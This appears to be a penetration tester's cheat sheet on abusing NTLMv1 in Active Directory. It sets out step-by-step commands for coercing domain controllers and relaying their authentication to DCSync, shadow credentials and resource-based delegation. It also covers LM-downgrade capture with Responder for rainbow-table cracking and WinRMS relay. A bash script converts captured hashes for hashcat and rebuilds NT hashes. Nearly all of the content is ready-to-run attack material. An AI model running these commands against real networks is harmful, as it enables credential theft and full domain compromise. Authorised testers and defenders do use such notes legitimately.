Check if NTLMv1 is in use - Method 0

nxc smb $dc -u $admin -p $adminpw -M ntlmv1

[!warning] Administrative privileges required :( (the module reads LmCompatibilityLevel from the remote registry). Without admin, the unauthenticated way to find out is to capture a hash (Method 4) and look at its format: an NTLMv1 response is a 48-hex-character NT response after the `user::DOMAIN:` prefix, while NTLMv2 carries a long blob.



Coerce and relay two DC’s to each other - Method 1

# DCsync with ntlmrelayx
ntlmrelayx.py -t dcsync://$dc-fqdn -smb2support # -auth-smb $user:$pass
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true

# DCsync with secretsdump through the relayed SMB session (prox = proxychains4 alias)
ntlmrelayx.py -t smb://$dc-fqdn -socks -smb2support # --remove-mic
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true
prox -f proxychains4relayx.conf secretsdump.py -no-pass $domain/DC1$@$dc-ip

[!tip] If you receive NTLMv1 hashes from a DC, you can often relay the two DCs to each other and use the computer account of one DC against the other. A computer account is normally nothing special, but domain controller computer accounts are highly trusted (they are allowed to replicate directory data), which makes a DCSync, or an RBCD / Shadow Credentials attack, possible. Keep in mind that domain controllers require SMB signing by default, so the smb:// target only works where signing has been switched off; the dcsync:// target or an LDAP/LDAPS target (Methods 2 and 3) is the usual path. (source)



Shadow credentials - Method 2

# Coerce DC2 and relay its authentication to LDAP on DC1 to add shadow credentials (msDS-KeyCredentialLink) on DC2's computer account
ntlmrelayx.py -t ldap://$dc-fqdn --remove-mic -smb2support --shadow-credentials
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true

# Using the pfx - Method 1 (PKINITtools): get a TGT via PKINIT, then recover the NT hash with the AS-REP key
python3 gettgtpkinit.py -cert-pfx [CERTIFICATE].pfx -pfx-pass [PASSWORD] $domain/[MACHINE ACCOUNT$] [TICKET].ccache # If this fails, switch DC
export KRB5CCNAME=[TICKET].ccache
python3 getnthash.py $domain/[MACHINE ACCOUNT$] -key [AS-REP encryption key]

# Using the pfx - Method 2 (Certipy)
certipy cert -pfx [CERTIFICATE].pfx -password [PASSWORD] -export -out dc2.pfx
certipy auth -pfx dc2.pfx -dc-ip $dc -username [MACHINE ACCOUNT$] -domain $domain

# Cleanup, clear the shadow credentials again
certipy shadow clear -account [MACHINE ACCOUNT$] -dc-ip $dc -u administrator@$domain -hashes :<NT>

[!example] Sources



Delegate access - Method 3

# ntlmrelayx creates the machine account over LDAPS, so check 636 first. If it is closed or filtered, hope MAQ is not 0 and create the machine account yourself (addcomputer.py or nxc), then hand it to ntlmrelayx with --escalate-user
nmap -p 636 $dc
nxc ldap $dc -u $user -p $pass -M maq
nxc smb $dc -u $user -p $pass -M add-computer -o NAME='AttackerPC' PASSWORD='[PASSWORD]'

# Relaying to delegate access 
ntlmrelayx.py -t ldap://$dc-fqdn --keep-relaying --remove-mic -smb2support --delegate-access | tee ntlmrelayx.txt

# Relaying to delegate access to a machine account you already control
ntlmrelayx.py -t ldap://$dc-fqdn --keep-relaying --remove-mic -smb2support --delegate-access --no-validate-privs --escalate-user [CONTROLLED-MACHINE-ACC]$

# Coercing :D
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true

# Request S4U2Self+S4U2Proxy tickets to impersonate Administrator on DC2 (quote the account name, the $ is special to the shell)
getST.py -spn cifs/$dc2-fqdn -impersonate Administrator -dc-ip $dc $domain/'AttackerPC$':[PASSWORD]
export KRB5CCNAME=[TICKET].ccache

# DCsync with the Kerberos ticket (Kerberos needs the FQDN as target)
secretsdump.py -k -no-pass $domain/Administrator@$dc2-fqdn -user-status -outputfile dcsync_hashes
# or
nxc smb $dc2 --use-kcache --ntds --user Administrator

# Cleanup: read msDS-AllowedToActOnBehalfOfOtherIdentity first, then remove only your own machine account from it (flush empties the attribute, which is only the "original state" if it was empty before)
rbcd.py -delegate-to 'dc2$' $domain/administrator -hashes :<NT> -dc-ip $dc -action read
rbcd.py -delegate-to 'dc2$' -delegate-from 'AttackerPC$' $domain/administrator -hashes :<NT> -dc-ip $dc -action remove

[!example] Sources

[!warning] If you cannot create a machine account but do have the NT hash of one, pass-the-hash works under normal circumstances. If the domain has disabled the "weak" Kerberos encryption types, RC4 (and therefore the NT hash) will not work for tickets. You can try resetting the computer account's password with ksetup so that the DC (and you) have AES keys for that account.



Cracking - Method 4

# The fixed challenge 1122334455667788 is what the rainbow tables are built for (older Responder versions take it from Responder.conf, Challenge = 1122334455667788)
sudo Responder -I ens33 -ntlmchallenge 1122334455667788 --lm
sudo Responder -I ens33 -ntlmchallenge 1122334455667788 --disable-ess # if --lm did not work

[!info] The --lm flag forces an LM downgrade, which can make the responses crackable almost immediately via rainbow tables built for the fixed challenge. If that does not work, try the --disable-ess flag instead. When ESS (NTLM2 session security) cannot be stripped, the DES plaintext is no longer the raw server challenge but the first 8 bytes of MD5(server challenge || client nonce), so rainbow tables no longer apply. In that case the response can still be cracked with hashcat after reformatting it with ntlmv1-multi, or by using assless-chaps. Source
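The reformatting step described above, written out as an added example (not part of the original notes or of ntlmv1-multi): it takes a Responder NTLMv1 line, tells NTLMv1 from NTLMv1-ESS and NTLMv2 (which also answers the Method 0 question without admin rights), emits the three DES blocks in hashcat -m 14000 `ciphertext:plaintext` form, and rebuilds the NT hash from the three cracked DES keys by stripping the parity bit of every key byte. Assumptions: bash with coreutils (md5sum, cut); the sample capture lines are constructed, not real credentials; the `user::DOMAIN:LM:NT:CHALLENGE` layout is Responder's.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes or from ntlmv1-multi.
# Assumes bash + coreutils; sample lines below are constructed.

FIXED_CHALLENGE=1122334455667788   # challenge the rainbow tables expect

# Print the raw bytes for a hex string (octal escapes work in any printf).
hex_to_bin() {
    local hex=$1 i
    for ((i = 0; i < ${#hex}; i += 2)); do
        printf "\\$(printf '%03o' "$((16#${hex:i:2}))")"
    done
}

# Classify one Responder line: prints ntlmv1, ntlmv1-ess or other.
# NTLMv1 has a 48-hex NT response and a 16-hex challenge as the last field;
# with ESS the LM field is an 8-byte client nonce followed by 16 zero bytes.
ntlm_kind() {
    local user empty domain lm nt chal
    IFS=: read -r user empty domain lm nt chal <<<"$1"
    [[ ${#nt} -eq 48 && ${#chal} -eq 16 ]] || { echo other; return 1; }
    if [[ ${lm:16} == "00000000000000000000000000000000" ]]; then
        echo ntlmv1-ess
    else
        echo ntlmv1
    fi
}

# Emit the three DES blocks as ciphertext:plaintext for hashcat -m 14000.
# Plaintext = server challenge, or with ESS MD5(challenge || client nonce)[0:8].
# The third block's key is only the last 2 NT-hash bytes plus five zero bytes,
# so it needs at most 65536 candidates.
ntlmv1_to_hashcat14000() {
    local line=$1 user empty domain lm nt chal pt kind
    kind=$(ntlm_kind "$line") || return 1
    IFS=: read -r user empty domain lm nt chal <<<"$line"
    if [[ $kind == ntlmv1-ess ]]; then
        pt=$(hex_to_bin "${chal}${lm:0:16}" | md5sum | cut -c1-16)
    else
        pt=$chal
    fi
    [[ $chal == "$FIXED_CHALLENGE" ]] ||
        echo "# warning: challenge is not $FIXED_CHALLENGE, rainbow tables will not apply" >&2
    printf '%s:%s\n' "${nt:0:16}" "$pt" "${nt:16:16}" "$pt" "${nt:32:16}" "$pt"
}

# Drop the parity (low) bit of each byte of an 8-byte DES key and repack the
# 56 remaining bits into 7 bytes; returns 14 hex chars.
des_key_to_7bytes() {
    local key=$1 n=0 i b
    [[ $key =~ ^[0-9a-fA-F]{16}$ ]] || return 1
    for ((i = 0; i < 16; i += 2)); do
        b=$((16#${key:i:2}))
        n=$(( (n << 7) | (b >> 1) ))
    done
    printf '%014x' "$n"
}

# NT hash = 7 bytes from key1 || 7 bytes from key2 || first 2 bytes from key3.
nthash_from_des_keys() {
    local k1 k2 k3
    k1=$(des_key_to_7bytes "$1") && k2=$(des_key_to_7bytes "$2") &&
        k3=$(des_key_to_7bytes "$3") || return 1
    printf '%s%s%s\n' "$k1" "$k2" "${k3:0:4}"
}

# Demo on constructed captures (fake responses, fixed challenge).
PLAIN='svc::CORP:0123456789abcdef0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef0123456789abcdef:1122334455667788'
ESS='svc::CORP:aabbccddeeff011100000000000000000000000000000000:0123456789abcdef0123456789abcdef0123456789abcdef:1122334455667788'
echo "plain capture is $(ntlm_kind "$PLAIN"):"; ntlmv1_to_hashcat14000 "$PLAIN"
echo "ess capture is $(ntlm_kind "$ESS"):";     ntlmv1_to_hashcat14000 "$ESS"
# Keys as hashcat would return them (odd-parity DES keys); rebuilds
# 0123456789abcd0123456789abcdef01 as the NT hash.
echo "NT hash: $(nthash_from_des_keys 0191d0ad794cae9b 0191d0ad794cae9b ee80400000000000)"
```

Feed the printed `ciphertext:plaintext` lines to `hashcat -m 14000`; the DES keys hashcat recovers carry parity bits, which is why `nthash_from_des_keys` strips one bit per byte before concatenating.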



Relaying WINRMS - Method 5 (under specific circumstances)

# Relaying
ntlmrelayx.py -t winrms://$dc -smb2support -socks --keep-relaying
sudo Responder -I ens33

# Dump secrets through the relayed WinRM session if you get a hit (prox = proxychains4 alias)
prox -f proxychains4relayx.conf secretsdump.py -no-pass $domain/DC1$@$target-ip

[!info] Requirements

  • NTLMv1 in use or an NTLM downgrade path is available
  • Target has a WinRM-over-HTTPS (WinRMS) listener configured
  • Channel Binding Tokens (CBT) are not enforced (or are set to “None/Relaxed”) on that WinRMS listener
  • ARP/LLMNR/NBT-NS poisoning possible

[!example] Sources